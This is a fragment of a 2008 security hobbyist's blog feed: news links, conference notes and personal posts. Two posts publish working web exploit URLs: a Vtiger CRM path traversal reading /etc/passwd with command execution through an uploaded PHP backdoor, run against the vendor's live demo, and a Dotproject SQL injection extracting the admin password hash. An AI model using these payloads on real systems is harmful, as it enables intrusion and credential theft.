href='http://wehavedayjobs.blogspot.com/2008/07/openbsd-local-exploit.html' title='OpenBSD Local Exploit'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-4319446166354364337</id><published>2008-06-26T21:51:00.001+08:00</published><updated>2008-12-10T10:41:46.477+08:00</updated><title type='text'>PRC site flagged by Google</title><content type='html'>&lt;a href="http://www.google.com/safebrowsing/diagnostic?site=http://www.prc.gov.ph"&gt;http://www.google.com/safebrowsing/diagnostic?site=http://www.prc.gov.ph&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_z88lTJOxKPA/SGOfiHfvzkI/AAAAAAAAABA/2GV2Ra3tL1I/s1600-h/prc.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://1.bp.blogspot.com/_z88lTJOxKPA/SGOfiHfvzkI/AAAAAAAAABA/2GV2Ra3tL1I/s320/prc.png" alt="" id="BLOGGER_PHOTO_ID_5216188201901739586" border="0" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-4319446166354364337?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/4319446166354364337/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=4319446166354364337' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/4319446166354364337'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/4319446166354364337'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2008/06/prc-site-flagged-by-google.html' title='PRC site flagged by Google'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_z88lTJOxKPA/SGOfiHfvzkI/AAAAAAAAABA/2GV2Ra3tL1I/s72-c/prc.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-6969682356830505858</id><published>2008-06-22T17:05:00.003+08:00</published><updated>2008-06-22T17:45:27.251+08:00</updated><title type='text'>Newsworthy?</title><content type='html'>Some things I saw on the Net...&lt;br /&gt;&lt;br /&gt;&lt;a style="font-weight: bold;" href="http://blog.wired.com/27bstroke6/2008/06/hacker-hijacks.html"&gt;Metasploit site gets hacked&lt;/a&gt;&lt;a style="font-weight: bold;" href="http://blog.wired.com/27bstroke6/2008/06/hacker-hijacks.html"&gt;...&lt;/a&gt;  Not really, just made to appear as if it was.&lt;br /&gt;&lt;a style="font-weight: bold;" href="http://computerworld.com/action/article.do?command=viewArticleBasic&amp;amp;articleId=9087441"&gt;Erik Bloodaxe resurfaces...&lt;/a&gt; Is this the same Chris Goggans of LOD?&lt;br /&gt;&lt;br /&gt;&lt;a style="font-weight: bold;" href="http://www.gcn.com/online/vol1_no1/46352-1.html"&gt;Cisco router rootkits...&lt;/a&gt; = bad news, since a lot of infra backbone depends on them&lt;br /&gt;&lt;br /&gt;Most of the above  items are a bit old, I was a little too busy to blog about them at the time.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;And now  for some local news... (Somehow this makes me laugh =) )&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;&lt;a href="http://www.abs-cbnnews.com/storypage.aspx?storyid=120689"&gt;&lt;span style="font-size:100%;"&gt;&lt;span id="UsrStory1_lblTitleArticle" class="headline"&gt;RP computer hackers turning into syndicates&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/h2&gt; &lt;span style="font-style: italic;"&gt;Isn't this guy just watching Youtube?&lt;/span&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.abs-cbnnews.com/images/news/newspics/buck_pago/20080604_cafe.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 320px;" src="http://www.abs-cbnnews.com/images/news/newspics/buck_pago/20080604_cafe.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;"&lt;span id="UsrStory1_lblBodyArticle" class="pspacer"&gt;&lt;span style="font-family:Arial;"&gt;Authorities have been monitoring certain e-groups or "societies" that could be behind big, transnational cyber crimes...&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;"&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;br /&gt;"...&lt;span id="UsrStory1_lblBodyArticle" class="pspacer"&gt;&lt;span style="font-family:Arial;"&gt;There is also a group of crackers, college boys, who only focus on getting credit card information&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;"&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;"&lt;span id="UsrStory1_lblBodyArticle" class="pspacer"&gt;&lt;span style="font-family:Arial;"&gt;the syndicate committed phreaking, which exploited security loopholes to obtain free access to telephone calls at the expense of customers of the Philippine Long Distant Telephone (PLDT). The process involves using a "war dialer" to call different phone numbers and then guessing the pincodes to those numbers in order to freely access the system to make long distance calls.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;"&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;the use of wardialers is so early 90's  =)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span id="UsrStory1_lblBodyArticle" class="pspacer"&gt;&lt;span style="font-family:Arial;"&gt;"We used 200 men—SWAT, PNP, NBI—all fully armed because we didn’t know what we were up against.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;"&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;Whaaatt?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span id="UsrStory1_lblBodyArticle" class="pspacer"&gt;&lt;span style="font-family:Arial;"&gt;".. was the absence of the money trail that bewildered law enforcement at first&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;..."&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;Always about the money =)&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.abs-cbnnews.com/images/news/newspics/abs/20080604alexramos.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 200px;" src="http://www.abs-cbnnews.com/images/news/newspics/abs/20080604alexramos.jpg" alt="" border="0" /&gt;&lt;/a&gt;                                             &lt;span style="font-style: italic;"&gt; Alex Ramos, Anti-Hacker Man&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Some Personal news...&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;I got an Asus EEE!  Yesss!&lt;br /&gt;&lt;br /&gt;Actually it's my gf's.&lt;br /&gt;But I'm paying for it. Hmm... Wait a minute...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-6969682356830505858?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/6969682356830505858/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=6969682356830505858' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/6969682356830505858'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/6969682356830505858'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2008/06/excerpts.html' title='Newsworthy?'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-2888715642446773981</id><published>2008-06-22T16:53:00.003+08:00</published><updated>2008-06-22T17:05:22.055+08:00</updated><title type='text'>Busy..</title><content type='html'>Been having quite a turbulent time with "My Day Job". The company I work for had some massive reorganization which resulted in the head our department resigning, having a non-technical person taking his place, numerous resignations from employees including some who were at the managerial level, and me having to do the jobs of three engineers. Oh well...&lt;br /&gt;&lt;br /&gt;Maybe I should start looking for a new job :)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-2888715642446773981?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/2888715642446773981/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=2888715642446773981' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/2888715642446773981'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/2888715642446773981'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2008/06/busy.html' title='Busy..'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-737854453493677043</id><published>2008-04-20T19:47:00.001+08:00</published><updated>2008-04-20T19:51:34.872+08:00</updated><title type='text'>NBI exasperated over delay of cybercrime bill, hits CICT</title><content type='html'>&lt;span class="lead"&gt;An IT officer of the National Bureau of Investigation (NBI) has lambasted the continued delay in the passage of the country’s cybercrime law, pointing out in particular the failure of the Commission on Information and Communications Technology (CICT) to submit an industry-drafted amendment to strengthen a bill currently pending in Congress.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;         &lt;p align="left"&gt;"We’re frustrated in our law-enforcement work because we cannot go after these cybercriminals. Every minute that passes without a law on cybercrime is always an opportunity for them to do what they want," said Palmer Mallari, executive officer of the NBI anti-fraud and computers crime division.&lt;/p&gt;&lt;a href="http://www.mb.com.ph/INFO20080420122123.html"&gt;Read more...&lt;/a&gt;&lt;br /&gt;&lt;p align="left"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p align="left"&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-737854453493677043?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/737854453493677043/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=737854453493677043' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/737854453493677043'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/737854453493677043'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2008/04/nbi-exasperated-over-delay-of.html' title='NBI exasperated over delay of cybercrime bill, hits CICT'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-8376178928618176685</id><published>2008-03-21T02:36:00.002+08:00</published><updated>2008-03-21T02:42:00.123+08:00</updated><title type='text'>Obviously backdoored</title><content type='html'>&lt;a href="http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1157"&gt;http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1157&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.cisco.com/warp/public/707/cisco-sa-20080313-ipm.shtml"&gt;http://www.cisco.com/warp/public/707/cisco-sa-20080313-ipm.shtml&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;"CiscoWorks IPM is a troubleshooting application that gauges network   response time and availability. It is available as a component within the   CiscoWorks LAN Management Solution (LMS) bundle. IPM version 2.6 for Solaris   and Windows contains a process that causes a command shell to automatically be   bound to a randomly selected TCP port. Remote, unauthenticated users are able   to connect to the open port and execute arbitrary commands with   &lt;i&gt;casuser&lt;/i&gt; privileges on Solaris systems and with   &lt;i&gt;SYSTEM&lt;/i&gt; privileges on Windows systems."&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;App na naggagauge ng network time magbubukas ng bindhsell!? Ayusin mo, Cisco!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-8376178928618176685?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/8376178928618176685/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=8376178928618176685' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/8376178928618176685'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/8376178928618176685'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2008/03/obviously-backdoored.html' title='Obviously backdoored'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-5005869337936755520</id><published>2008-02-26T21:15:00.002+08:00</published><updated>2008-02-26T21:21:38.320+08:00</updated><title type='text'>You never know...</title><content type='html'>I found out a very cool way to do something which a lot of people want to do =) I won't go into specifics since by having the info spread it would pretty much lead to it being unusable. I actually had this idea a long time ago but I thought to myself that such an obvious way would surely not be permitted. So you never know... =)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-5005869337936755520?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/5005869337936755520/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=5005869337936755520' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/5005869337936755520'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/5005869337936755520'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2008/02/you-never-know.html' title='You never know...'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-3467884992591378758</id><published>2008-02-25T22:22:00.003+08:00</published><updated>2008-02-25T22:34:45.133+08:00</updated><title type='text'>Hackacon 2008</title><content type='html'>&lt;a href="http://www.hackacon.com/main.html"&gt;&lt;span style="font-weight: bold;"&gt;http://www.hackacon.com/main.html&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;" class="style41"&gt;HackaCon 2008&lt;/span&gt; – An International IT Security Convention, Exhibition and Training, the only conference dedicated entirely to keep data safe, secure, and private, will be held on August 8 – 10, 2008 at the SM Mega Trade Hall 1, Mandaluyong City, Philippines.&lt;br /&gt;&lt;br /&gt;SESSIONS&lt;br /&gt;&lt;br /&gt;P 500.00 / Topic - Inclusive of Certificate&lt;br /&gt;&lt;br /&gt;   * Certified Ethical Hacking and Countermeasures (CEH)&lt;br /&gt;     Featured Speaker:     Wilbert Ontoy&lt;br /&gt;&lt;br /&gt; * Linux Security&lt;br /&gt;     Featured Speaker     Michael Angelo Liquit    &lt;br /&gt;         &lt;br /&gt;   * Disaster Recovery (DR)&lt;br /&gt;     Featured Speaker:     Abel Villoria    &lt;br /&gt;         &lt;br /&gt;   * Licensed Penetration Tester (LPT)&lt;br /&gt;     Featured Speaker:     Wilbert Ontoy / Armand    &lt;br /&gt;&lt;br /&gt;   * Security+&lt;br /&gt;     Featured Speaker:     Wilbert Ontoy    &lt;br /&gt;         &lt;br /&gt;   * Microsoft Security&lt;br /&gt;     Featured Speaker:     Jefferson Agruda    &lt;br /&gt;         &lt;br /&gt;   * Hardening against TCP/IP Attacks&lt;br /&gt;     Featured Speaker:     Edward Brian Bono    &lt;br /&gt;         &lt;br /&gt;   * Wireless Hacking and Security&lt;br /&gt;     Featured Speaker:     Darwin Luzuriaga    &lt;br /&gt;         &lt;br /&gt;   * Computer Hacking Forensic Investigator (CHFI)&lt;br /&gt;     Featured Speaker:     Ariel Ilumin (PNP Forensic Expert)  &lt;br /&gt;&lt;br /&gt;[Let's see how this turns out. Nice mix of topics. The organizers should have  should have registered as a&lt;a href="http://defcon.org/html/defcon-groups/dc-groups-index.html"&gt; defcon group &lt;/a&gt;=) ]&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-3467884992591378758?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/3467884992591378758/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=3467884992591378758' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/3467884992591378758'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/3467884992591378758'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2008/02/hackacon-2008.html' title='Hackacon 2008'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-779164946942197138</id><published>2008-02-17T22:34:00.012+08:00</published><updated>2008-02-18T00:00:18.634+08:00</updated><title type='text'>Vtiger CRM Exploit ( 0-day )</title><content type='html'>&lt;a href="http://vtiger.com/"&gt;Vtiger CRM&lt;/a&gt; is 100% Open Source Customer Relationship Management solution built over LAMP/WAMP stack and other third-party open source packages. I made a quick run-through on their &lt;a href="http://en.vtiger.com/"&gt;demo site&lt;/a&gt; and discovered some stuff.You need to be authenticated first.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;LFI&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;http://en.vtiger.com/index.php?action=../../../../../../../../etc/passwd% 00&amp;amp;module=Home&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Command Execution&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;First, upload a php backdoor disguised as a valid &lt;a href="http://sujiru.googlepages.com/kidlat.gif"&gt;picture file&lt;/a&gt;. And then...&lt;br /&gt;&lt;br /&gt;http://en.vtiger.com/index.php?cmd=uname%20-a;id;pwd&amp;amp;action=../../storage/2008/February/&lt;br /&gt;week1/31361_kidlat.gif% 00&amp;amp;module=Home&lt;br /&gt;&lt;br /&gt;I did not install the software and I stopped when I reached this point so I wasn't able to find all the bugs =)&lt;br /&gt;&lt;br /&gt;[there sould be no space between % and 00 in the url, can't post it as such here coz blogger's stripping them out]&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-779164946942197138?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/779164946942197138/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=779164946942197138' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/779164946942197138'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/779164946942197138'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2008/02/vtiger-crm-exploit-0-day.html' title='Vtiger CRM Exploit ( 0-day )'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-5374862812192739331</id><published>2008-02-17T22:21:00.002+08:00</published><updated>2008-02-17T22:24:51.249+08:00</updated><title type='text'>The real reason...</title><content type='html'>... why you rarely see any Windows XP SP2 remote exploit is because there's a lot of buyers out there for these kind of exploits and they pay well =)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-5374862812192739331?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/5374862812192739331/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=5374862812192739331' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/5374862812192739331'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/5374862812192739331'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2008/02/real-reason.html' title='The real reason...'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-5963618589611934279</id><published>2008-02-17T22:09:00.003+08:00</published><updated>2008-02-18T00:11:53.698+08:00</updated><title type='text'>Defcon in the Philippines</title><content type='html'>&lt;a href="http://www.defcon.org/"&gt;DEFCON&lt;/a&gt; is now in the philippines. The guys from the defunct rootdrive.net and nullcode.net have registered a new &lt;a href="http://www.defcon.org/html/defcon-groups/dc-groups-index.html"&gt;defcon group&lt;/a&gt; . Visit their &lt;a href="http://defconph.org/"&gt;new site&lt;/a&gt;. Personally, I'm looking forward to a real hacker-type con =)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-5963618589611934279?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/5963618589611934279/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=5963618589611934279' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/5963618589611934279'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/5963618589611934279'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2008/02/defcon-in-philippines.html' title='Defcon in the Philippines'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-8791957875677087530</id><published>2008-02-08T15:26:00.000+08:00</published><updated>2008-02-08T17:40:03.987+08:00</updated><title type='text'>Free mobile yahoo</title><content type='html'>&lt;a href="http://www.globe.com.ph"&gt;Globe&lt;/a&gt; users can browse &lt;a href="http://ph.m.yahoo.com"&gt;yahoo&lt;/a&gt; mobile for free meaning you can chat with your friends even if you don't have cellphone load. I use it to stay updated on things by subscribing to active security lists. Aspiring hackers may find a way to configure their servers to execute shell scripts upon receiving certain emails and mailing back the output.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-8791957875677087530?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/8791957875677087530/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=8791957875677087530' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/8791957875677087530'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/8791957875677087530'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2008/02/free-mobile-yahoo.html' title='Free mobile yahoo'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-8256793365345613256</id><published>2008-01-30T18:07:00.000+08:00</published><updated>2008-01-30T18:11:55.938+08:00</updated><title type='text'>New version of metasploit released</title><content type='html'>&lt;a href="http://metasploit3.com/documents/RELEASE-3.1.txt"&gt;Metasploit 3.1&lt;/a&gt; released. The best &lt;strong&gt;FREE&lt;/strong&gt; exploitation platform out today.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-8256793365345613256?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/8256793365345613256/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=8256793365345613256' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/8256793365345613256'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/8256793365345613256'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2008/01/new-version-of-metasploit-released.html' title='New version of metasploit released'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-3197629455135083289</id><published>2008-01-11T11:51:00.000+08:00</published><updated>2008-01-30T18:06:27.655+08:00</updated><title type='text'>Dotproject Exploit ( 0day )</title><content type='html'>&lt;a href="http://dotproject.net/"&gt;Dotproject&lt;/a&gt; is a web based project management software based on LAMP. The following url will give out the admin password hash.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://site.com/dotproject/index.php?m=public&amp;amp;a=contact_selector&amp;amp;selected_contacts_id=1)%20union%20select%20user_password%20from%20users%20where%20user_id=1/*"&gt;http://site.com/dotproject/index.php?m=public&amp;amp;a=contact_selector&amp;amp;selected_contacts_id=1)%20union%20select%20user_password%20from%20users%20where%20user_id=1/*&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;This can be exploited from an ordinary user account, but you need to login first.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Clarification (1-14-08)&lt;/strong&gt;&lt;br /&gt;Fixed the misplaced the asterisk symbol (*) on the original link.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Edit ( 1-30-08 )&lt;/strong&gt;&lt;br /&gt;Patched na daw. Follow the &lt;a href="http://lists.sakienvirotech.com/pipermail/dpmaintenance/2008-January/000115.html"&gt;thread&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-3197629455135083289?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' 